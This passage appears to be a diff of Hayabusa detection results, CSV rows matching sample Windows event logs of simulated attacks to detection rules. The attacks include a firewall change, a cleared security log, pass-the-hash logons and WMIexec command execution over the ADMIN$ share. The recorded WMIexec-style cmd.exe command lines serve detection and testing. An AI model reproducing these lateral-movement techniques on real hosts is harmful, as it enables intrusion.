rule activation.evtx
+2021-04-23 19:09:46.471 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallRule (CreationClassName = ""MSFT?FW?FirewallRule?sshd"", PolicyRuleName = """", SystemCreationClassName = """", SystemName = """")""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:46.472 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:46.475 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:10:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x3cc | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-26 17:25:31.043 +09:00,srvdefender01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da321f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da324f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da324f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da3273,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da3273,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da3292,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da3292,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da32af,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da32af,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.258 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0xd44 | User: SRVDEFENDER01$ | LID: 0x3e4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.313 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.325 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.329 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.332 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.335 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.338 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.342 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.344 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.348 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.350 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.354 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.356 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.360 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.363 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.367 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.369 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.373 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.375 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.379 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.381 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 127.0.0.1 | LID: 0x4da32af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.388 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.391 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.394 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.399 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.406 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.409 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.418 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.420 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.435 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x1b98 | User: SRVDEFENDER01$ | LID: 0x3e4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.450 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.452 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.456 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.458 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.462 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.464 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.479 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.481 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
